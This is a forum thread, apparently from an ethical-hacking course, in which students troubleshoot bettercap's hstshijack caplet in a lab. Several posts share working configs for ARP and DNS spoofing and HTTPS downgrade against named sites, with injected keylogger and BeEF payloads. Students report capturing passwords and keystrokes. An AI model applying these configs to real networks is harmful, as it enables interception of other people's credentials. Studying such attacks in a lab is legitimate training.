Bettercap hstshijack not working

After I did what you suggested :

Normal http websites are sniffed out fine now, like before. I’m able to see the username and passwords.

But, when I go to https websites like stackoverflow.com, I get 206 Partial Content -> MSEDGEWIN10.local

The packages are http packets, which is an improvement.

This is from the Win 10 VM on the same NAT network.


Yes, I see, but you didn’t tell me if you already tried the above suggestions?

I installed 2.23 of bettercap and got the above results

See, bettercap custom hstshijack will fail to downgrade the connection due to one or more of the following reasons:

  1. You missed a tiny step, so please revise the lectures and make sure you do everything as shown.

  2. You manually typed https:// in the URL bar.

  3. You manually configured the DNS server in the target machine to 8.8.8.8 or 1.1.1.1 or anything else.

  4. You have a browser extension that is stopping this such as https-everywhere or no-javascript.

  5. You did not fully remove browsing data.

  6. Try also to execute the commands manually inside bettercap instead of using the spoof.cap, and try it against different browsers and see if you can downgrade the connection.

I tried without manually typing https://, I erased all browsing data, I tried Chrome, Edge and Firefox.

I did not ever manually tamper with the DNS settings. I only recently installed the Win 10 VM anyway.

I have no extensions installed in any of the browsers.

I have already both manually done the commands and done it using the spoof.cap file.

I am currently reviewing the lecture again, but up till now, I did not find any mistake. I shall keep trying.

image
image

Okay, please try again, just reboot both Kali and Windows for the purpose of testing and let us know if you face the same issue. Try it also within the nat network as shown in the course. If it works, then try to proceed with testing against the real machine. Make sure also that you don’t connect Windows VM to a bridged adapter.

I have rebooted it multiple times, but the same result always occurs. The above result is in the nat network. And yes, the windows VM is not connected to the wireless adapter.

If you are unable to debug this issue, could you send some alternatives and links to their documentation and/or tutorials?? It would be really helpful.

Thanks

Here are the docs:
https://www.bettercap.org/legacy/

Actually, I meant the documentation of the alternatives

1 Like

I 've encountered the same issue.
Spoofing worked but the https downgrade failed.

At the moment I got everything to work, except for login and password capture in https-websites.

I set my spoof.cap to:
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.target 192.168.0.217
arp.spoof on
set net.sniff.local true
set net.sniff.output stored_output.cap
net.sniff on

I ran the spoof:
sudo bettercap iface eth0 -caplet /root/spoof.cap

Checked if it worked, using command help.
Then I already checked the connection by generation traffic on the Windows VM.
And after that traffic was captured in kali.
Then I entered the command:
hstshijack/hstshijack

And then suddenly it did work…

at first the hsts-downgrade failed, because f.i. Facebook.corm gave an error message, so I downgraded to Bettercap 2.23 as shown by AJS.
Then I restarted both Linux VM and Windows VM (target).
And after that also hsts-downgraded website loaded.
And I can capture login and password input.

Only problem is I can’t get the key capture to work for downgraded https websites.
I m gonna try putting some websites in the hstshijack file.

I found an error in the hstshijack.cap as well for linkedin, I think.

hstshijack.targets: www.linkedin.com
hstshijack.replacements: linkedin.com

that should be different I thought.

So I changede it to *.linkedin.com for targets
and *.linkedin.corn for replacements and dns spoof domains.

The downgrade only works when used in http://google.com
https://google.com doesn’t do the trick.

And on bing almost no websites are downgraded.
Luckily google.com does get downgraded on bing.

I don’t get key stroke registration on Linkedin though
But I do so on Facebook and most of the times on Twitter.corn.

The system works but is not entirely stable…

update. I do get https downgrade to work.

But the examples Zaid uses in the course are currently HSTS instead of “regular” https.
Linkedin, Twitter are hsts at the moment.

I have the same problem and I still have not fixed it I changed my spoof.cap file to yours by adding “set net.sniff.output stored_output.cap”. which was the only difference between our spoof.cap files. but it still did not work. could you please explain how you fixed it so the login feature works when the hsts files have been downgraded and could you share your hstshijack file that made it work
thanks somkene

Hi Somkene,

I have set up hstshijack.cap as such:

"
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets twitter.com,.twitter.com,facebook.com,.facebook.com,apple.com,.apple.com,ebay.com,.ebay.com,.linkedin.com
set hstshijack.replacements twitter.corn,
.twitter.corn,facebook.corn,.facebook.corn,apple.corn,.apple.corn,ebay.corn,.ebay.corn,.linkedin.corn
set hstshijack.obfuscate false
set hstshijack.encode false
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js, *:/usr/share/bettercap/caplets/hstshijack/inject-beef.js

set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains twitter.corn,.twitter.corn,facebook.corn,.facebook.corn,apple.corn,.apple.corn,ebay.corn,.ebay.corn,*.linkedin.corn

http.proxy on
dns.spoof on

"

Which version fo Bettercap do you use?
Did you try downgrading to Bettercap 2.23 as shown by AJS in the post above?

yes I downgraded to bettercap 2.23

Hey can you please attach a link or file of older version ( 2.23 ) of Bettercap here. Coz I’m not able to find it anywhere. Plz reply if you see it.

Hey can you please attach a link or file of older version ( 2.23 ) of Bettercap here. Coz I’m not able to find it anywhere. Plz reply if you see it…

bro i have the same problem did you solve it ?

Hi @Security_Buster, did you try the old version of bettercap?